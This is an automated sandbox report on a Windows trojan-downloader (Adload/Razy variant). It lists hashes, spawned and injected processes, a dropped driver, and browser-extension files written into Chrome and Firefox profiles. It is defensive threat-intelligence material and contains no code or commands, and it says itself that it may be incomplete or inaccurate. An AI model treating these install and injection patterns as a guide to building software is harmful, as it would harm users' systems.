Gen.Variant.Razy.150085_cc1257ab71

by malwarelabrobot on August 31st, 2017 in Malware Descriptions.

Trojan-Downloader.Win32.Adload.pzpd (Kaspersky), Gen:Variant.Razy.150085 (B) (Emsisoft), Gen:Variant.Razy.150085 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: cc1257ab71774624b730464a2b2db389
SHA1: c57e755cd8744acab695c2927878b9d2a05b8ec1
SHA256: a9b032075ffc990a9e646b438865e61371e1f1ab96a3013fc6f8cab469b9cb01
SSDeep: 3072:saO0M9P8llqTIU Afah9M/2 VPH4ID5XPzCTJGpKg8IHQago8KHgCU4rR1vWsFhh:ib9P8llMIU Ac9DTJG4IHQQ59LtdnfT
Size: 218624 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2017-08-03 14:51:43
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan-Downloader: a Trojan program that downloads files from the Internet without the user's knowledge and executes them.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

brastub6ab_amobl_inst.exe:3884
csc.exe:1780
csc.exe:1992
csc.exe:3712
setup.4.15.f.exe:2796
enjoyWIFI.exe:2704
cvtres.exe:2872
cvtres.exe:1692
cvtres.exe:948
adv_334.exe:3644
adv_334.exe:1504
schtasks.exe:1084
schtasks.exe:3636
schtasks.exe:3944
schtasks.exe:1720
Setup.exe:2448
Setup.exe:4028
starter.exe:3588
ytab_m_1_big.exe:3664
ytab_m_1_big.exe:2980

The Trojan injects its code into the following process(es):

%original file name%.exe:1796
sdfCF40.exe:2912
Explorer.EXE:1440

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process brastub6ab_amobl_inst.exe:3884 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CabE58D.tmp (51 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\s4[1].ashx (342 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_del.bat (299 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\TarE58E.tmp (2712 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF (1480 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\p[1].ashx (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CabE58D.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\TarE58E.tmp (0 bytes)

The process %original file name%.exe:1796 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\18d11d6bcfa143319d89ee15d7989e1c\brastub6ab_amobl_inst.exe (54468 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0af7676060534b0ab7c9dbae31d28aae\Setup.exe (34372 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\pledmvys.out (455 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\g3tjlr04.0.cs (676 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\pledmvys.cmdline (388 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\d44724a9212341309f18eefcfdd9b06c\setup.exe (407464 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\wr-cs10y.cmdline (388 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\59f124f63a374212b0ef101e658ab10f\enjoyWIFI.exe (240166 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\wr-cs10y.0.cs (1444 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\b6142ece028a474c9d04d9344fbbe359\ytab_m_1_big.exe (252126 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\wr-cs10y.out (455 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\g3tjlr04.cmdline (388 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\193351eab5ff42369b2ed8f5929eb197\Setup.exe (80632 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\e3b3a628d7fa4f019f25eea6f351c9fd\starter.exe (218030 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\g3tjlr04.out (455 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\pledmvys.0.cs (5572 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\g3tjlr04.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\pledmvys.out (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\g3tjlr04.0.cs (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\pledmvys.cmdline (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\g3tjlr04.err (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\pledmvys.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\g3tjlr04.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\wr-cs10y.0.cs (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\wr-cs10y.err (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\wr-cs10y.out (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\pledmvys.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\g3tjlr04.cmdline (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\pledmvys.err (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\wr-cs10y.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\wr-cs10y.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\wr-cs10y.cmdline (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\g3tjlr04.out (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\pledmvys.0.cs (0 bytes)

The process csc.exe:1780 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\g3tjlr04.dll (3662 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\g3tjlr04.out (396 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CSC2931.tmp (652 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CSC2931.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RES2932.tmp (0 bytes)

The process csc.exe:1992 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\pledmvys.out (396 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\pledmvys.dll (2490 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CSC2B82.tmp (652 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CSC2B82.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RES2B93.tmp (0 bytes)

The process csc.exe:3712 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CSC2C4D.tmp (652 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\wr-cs10y.out (396 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\wr-cs10y.dll (4304 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CSC2C4D.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RES2C4E.tmp (0 bytes)

The process setup.4.15.f.exe:2796 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EnjoyWiFi\uninstall EnjoyWiFi.lnk (978 bytes)
%Program Files%\EnjoyWiFi\x86\wfcre.sys (2480 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshBE8E.tmp\wftinst.dll (29506 bytes)
%Program Files%\EnjoyWiFi\enjoywifi.ssf (4768 bytes)
%Program Files%\EnjoyWiFi\x64\wfcre.sys (5589 bytes)
%Program Files%\EnjoyWiFi\wfcrecf.dll (5260 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EnjoyWiFi\EnjoyWiFi.lnk (995 bytes)
C:\Windows\System32\drivers\wfcre.sys (3616 bytes)
C:\Users\Public\Documents\XMUpdate\conf.db (507 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshBE8E.tmp\System.dll (23 bytes)
%Program Files%\EnjoyWiFi\uninst.exe (5166 bytes)
%Program Files%\EnjoyWiFi\inst.db (5 bytes)
C:\Users\Public\Desktop\EnjoyWiFi.lnk (977 bytes)
%Program Files%\EnjoyWiFi\EnjoyWiFi.exe (22850 bytes)
%Program Files%\EnjoyWiFi\wftinst.dll (14753 bytes)
%Program Files%\EnjoyWiFi\zlib.dll (925 bytes)

The Trojan deletes the following file(s):

%Program Files%\EnjoyWiFi\x64 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssBE7E.tmp (0 bytes)
%Program Files%\EnjoyWiFi\x86 (0 bytes)
%Program Files%\EnjoyWiFi\x86\wfcre.sys (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshBE8E.tmp\wftinst.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshBE8E.tmp (0 bytes)
%Program Files%\EnjoyWiFi\x64\wfcre.sys (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshBE8E.tmp\System.dll (0 bytes)

The process enjoyWIFI.exe:2704 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00011657\setup.4.15.f.exe (2 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00011657\setup.4.15.f.exe (0 bytes)

The process cvtres.exe:2872 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RES2932.tmp (3666 bytes)

The process cvtres.exe:1692 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RES2B93.tmp (3666 bytes)

The process cvtres.exe:948 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RES2C4E.tmp (3666 bytes)

The process adv_334.exe:3644 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\tr\messages.json (141 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\cs\messages.json (144 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\bn\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\icons\icon48.png (2 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\fil\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\th\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\sq\messages.json (171 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\prefs.js (15861 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\vi\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\bg\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_metadata\computed_hashes.json (30 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\fr\messages.json (190 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\ko\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\da\messages.json (153 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\prefs.js_temp (776 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\de\messages.json (157 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\en_GB\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\id\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\de\messages.json (157 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\gu\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\files\foreground.js (2 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\hu\messages.json (156 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\it\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\no\messages.json (152 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\zh_CN\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\kn\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\be\messages.json (204 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\sk\messages.json (143 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\ms\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\Kernel.js (38 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\23B523C9E7746F715D33C6527C18EB9D (325 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\zh_CN\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\uk\messages.json (198 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\gu\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\icons\icon16.png (704 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\he\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\sw\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\en_US\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\install.rdf (16 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\zh_TW\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\he\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\sv\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\background.html (77 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\ja\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\bn\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\pt\messages.json (161 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\be\messages.json (204 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\hr\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_metadata\verified_contents.json (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\en\foreground.js (2 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\fi\messages.json (133 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\ml\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\zh_TW\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\te\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\sw\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\sl\messages.json (138 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\et\messages.json (127 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\skin\bindings.xml (1 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\pt_BR\messages.json (161 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\ru\messages.json (262 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ar\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\es\messages.json (186 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\bootstrap.js (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\th\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\am\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\hi\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\el\messages.json (197 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\it\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\lv\messages.json (149 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ko\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\23B523C9E7746F715D33C6527C18EB9D (876 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\lt\messages.json (149 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\hi\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome.manifest (78 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\mk\messages.json (194 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\es_419\messages.json (186 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\en\Content.js (2 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\cs\messages.json (144 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\te\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\sv\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\fi\messages.json (133 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\en_US\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\lv\messages.json (149 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ms\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\skin\styles.css (263 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\sl\messages.json (138 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\tr\messages.json (141 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\icons\icon128.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\ta\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\id\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\ca\messages.json (152 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ta\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\nl\messages.json (153 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\fil\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\pt\messages.json (161 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ja\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\uk\messages.json (198 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\en\Kernel.js (46 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\es_419\messages.json (186 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\hr\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\manifest.json (2 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ro\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\pt_PT\messages.json (161 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\en\main.css (673 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\ro\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\el\messages.json (197 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\fr\messages.json (190 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\mr\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\en_GB\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\am\messages.json (150 bytes)
